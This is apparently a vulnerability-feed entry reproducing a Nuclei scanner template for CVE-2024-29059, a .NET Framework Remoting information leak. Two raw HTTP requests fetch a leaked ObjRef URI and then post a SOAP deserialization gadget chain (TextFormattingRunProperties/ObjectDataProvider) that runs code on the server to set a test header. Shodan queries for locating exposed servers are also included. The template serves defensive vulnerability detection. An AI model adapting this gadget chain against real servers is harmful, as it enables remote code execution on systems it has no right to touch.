Source: nuclei (ProjectDiscovery), ID NUCLEI:CVE-2024-29059
History: Mar 28, 2024 - 1:17 p.m.

.NET Framework - Leaking ObjRefs via HTTP .NET Remoting

2024-03-28 13:17:52
ProjectDiscovery
github.com
cve
cve2024
dotnet
microsoft
remoting
deserialization
http
vulnerability

CVSS3: 7.5 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score: 7.2 High (Confidence: High)

EPSS: 0.009 Low (Percentile: 83.1%)

.NET Framework Information Disclosure Vulnerability

id: CVE-2024-29059

info:
  name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
  author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
  severity: high
  description: .NET Framework Information Disclosure Vulnerability
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
    - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
    - https://github.com/codewhitesec/HttpRemotingObjRefLeak
    - https://github.com/NaInSec/CVE-LIST
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-29059
    cwe-id: CWE-209
    epss-score: 0.01259
    epss-percentile: 0.85581
    cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: microsoft
    product: .net_framework
    shodan-query:
      - 'Server: MS .NET Remoting'
      - "server: ms .net remoting"
  tags: cve,cve2024,dotnet,microsoft,remoting,deserialization

http:
  - raw:
      - |
        GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
        Host: {{Hostname}}
        __RequestVerb: POST
        Content-Type: text/xml

      - |
        POST {{objref}} HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
        <ForegroundBrush id="ref-3">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;
          xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;
          xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;
          xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;
          xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;
          &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;
          &#60;/ObjectDataProvider.ObjectInstance&#62;
          &#60;/ObjectDataProvider&#62;
          &#60;/ObjectDataProvider.ObjectInstance&#62;
          &#60;ObjectDataProvider.MethodParameters&#62;
          &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;
          &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;
          &#60;/ObjectDataProvider.MethodParameters&#62;
        &#60;/ObjectDataProvider&#62;</ForegroundBrush>
        </a1:TextFormattingRunProperties>
        </SOAP-ENV:Envelope>

    extractors:
      - type: regex
        name: objref
        part: body_1
        group: 1
        regex:
          - "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
        internal: true

      - type: dsl
        dsl:
          - x_vuln_test

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1,'ObjRef')"
          - "contains(x_vuln_test,'{{randstr}}')"
        condition: and
# digest: 4a0a004730450220345063f60a2d0c6207c121752f7cb77e3dcbed7838778fba2d50401c0157e8b3022100c4030d56682e9556b292d09469ecf21d4119b2f3b7dd00ad8d5ee7c70a1c1f00:922c64590222798bb761d5b6d8e72950
